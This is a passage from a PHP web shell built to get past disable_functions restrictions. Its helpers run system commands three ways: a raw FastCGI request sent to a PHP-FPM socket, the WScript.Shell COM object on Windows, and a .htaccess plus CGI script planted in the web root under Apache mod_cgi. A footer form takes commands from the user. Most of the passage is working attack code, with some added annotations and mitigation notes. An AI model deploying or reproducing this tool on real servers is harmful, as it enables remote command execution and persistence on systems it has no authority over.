    $params_pad = p(($params_len >> 8) & 0xFF) . p($params_len & 0xFF) . p(0) . p(0);
    // BEGIN_REQUEST, PARAMS, empty PARAMS, STDIN, empty STDIN (request id 0x7b07).
    $fastcgi_data = '01017b0700080000000100000000000001047b07'.$params_pad.$params.'01047b070000000001057b07'.$php_code_pad.bin2hex($php_code).'01057b0700000000';
    $result = send_socket(hex2bin($fastcgi_data), $host, $port);
    // if($result != FAILURE){
    // $start = md5("s");;
    // $end = md5("e");;
    // $input = $result;
    // $result = substr($input, strlen($start)+strpos($input, $start),(strlen($input) - strpos($input, $end))*(-1));
    // }
    return $result;
}
//var_dump(fastcgi_exec("id",'/var/www/html/shell.php' , '127.0.0.1', 9002));
//echo fastcgi_exec("id",'/var/www/html/ant.php' , 'unix:///run/php/php7.3-fpm.sock');
//var_dump(fastcgi_exec("whoami",'C:\\phpstudy2018\\PHPTutorial\\WWW\test\\apache\\1.php' , '127.0.0.1', 9000));
/*
* COM执行: 仅限windows
* work on:
* php 5.4.45
*
* *******
* fail:
* > php 5.5.38
*
*/
/**
 * Run $cmd through the WScript.Shell COM object; Windows only (per the header
 * comment, works on PHP 5.4.45 and fails on 5.5.38 and later).
 *
 * Prefixes "cmd.exe /c", launches it with Run() without waiting, sleeps one
 * second and reads the result file, so commands that take longer return
 * truncated or empty output. The echoed notice is Chinese for: "a console
 * window appears and this takes time; take special care with commands that
 * delay".
 *
 * @param string $cmd command line
 * @return string|false|null captured output
 */
function com_exec($cmd){
    $cmd = "cmd.exe /c ".$cmd;
    $cmd_arr = send_cmd($cmd);
    echo "执行时候会黑框, 需要时间; 如果有延时命令执行的时候特别需要注意一下。";
    $wscript = new COM('wscript.shell');
    $wscript->Run($cmd_arr[0]);
    sleep(1);
    return recv_result($cmd_arr[1]);
}
//echo com_exec($_GET['cmd']);
/*
* Apache mod-cgi: Windows && Linux
* 需要保证一个web目录可写可访问
*
* 注意备份htaccess
*/
/**
 * Run $cmd through Apache mod_cgi: drop a .htaccess that enables ExecCGI in
 * the current directory plus a CGI script, then request the script through a
 * hidden <img>. Windows uses a .bat handler, Linux a .bylinux handler.
 *
 * Side effects: ./.htaccess is overwritten unconditionally (the header
 * comment asks for a backup) and both files are left behind; $dir is accepted
 * but unused, and the commented-out mod_cgi/is_writable check never runs.
 * Unlike the other helpers this echoes the result rather than returning it.
 * The echoed notice is Chinese for: "the command runs via the system so there
 * is some delay; run from a new directory so a broken .htaccess does not make
 * the shell itself unreachable".
 *
 * Mitigation: AllowOverride None (or excluding Options/FileInfo) on the
 * document root prevents per-directory enabling of ExecCGI; a new .htaccess
 * or .bat/.bylinux file under the web root is a file-integrity indicator.
 *
 * @param string $cmd command line
 * @param string $dir unused
 * @return void
 */
function apache_cgi_exec($cmd, $dir='.'){
    echo "由于是系统调用cmd执行后命令,会有一些延迟。请新建目录执行, 以免htaccess出问题导致本身shell不可访问。";
    // check
    // if(!in_array('mod_cgi', apache_get_modules()) && !empty($_SERVER['HTACCESS']) && is_writable($dir)){
    // return FAILURE;
    // }
    $cmd_arr = send_cmd($cmd);
    if(OS == "Windows") {
        $shell_file = "bye.bat";
        $htaccess = "ScriptInterpreterSource Registry-Strict\nAddHandler cgi-script .bat\nOptions +ExecCGI +FollowSymlinks";
        // Only the Windows branch escapes the command line.
        $cmd_arr[0] = escapeshellcmd($cmd_arr[0]);
        $content = "@echo off\necho Content-Type: text/html\nfor /F %%i in ('$cmd_arr[0]') do ( set result=%%i)";
    } else {
        $shell_file = "1.bylinux";
        $htaccess = "Options +ExecCGI\nAddHandler cgi-script .bylinux";
        $content = "#!/bin/bash\necho \"Content-Type: text/html\\n\\n\"\n" . $cmd_arr[0];
    }
    write_file('.htaccess', $htaccess);
    write_file($shell_file, $content);
    // The browser fetching this image is what makes Apache execute the script.
    echo "<img src = '$shell_file' style = 'display:none;'>";
    sleep(1);
    echo recv_result($cmd_arr[1]);
}
//echo apache_cgi_exec($_GET['cmd']);
// Footer: server configuration plus the command form. $disable_function_str,
// $vul_function_str and $open_basedir come from get_cfg_var()/a literal;
// $myscript is $_SERVER['PHP_SELF'] and is interpolated unescaped into the
// action attribute. Nothing in this file reads the submitted "bin", "cmd" or
// "path" fields: every exec helper call above is commented out, so as listed
// the page only reports which functions are callable.
echo <<<EOF
Disable Function: <br>
$disable_function_str <br><br>
Vulable Function: <br>
$vul_function_str <br><br>
Open Basedir: <br>
$open_basedir <br><br>
<form action="$myscript" method="post">
execpath: <input type="text" name="bin" value="/bin/bash"><br><br>
command: <input type="text" name="cmd" value=""><br><br>
writeable dir: <input type="text" name="path" value=""><br><br>
<input type="submit" name="submit" value="exec"><br><br>
</form>
EOF;
//echo $_POST["cmd"];
?>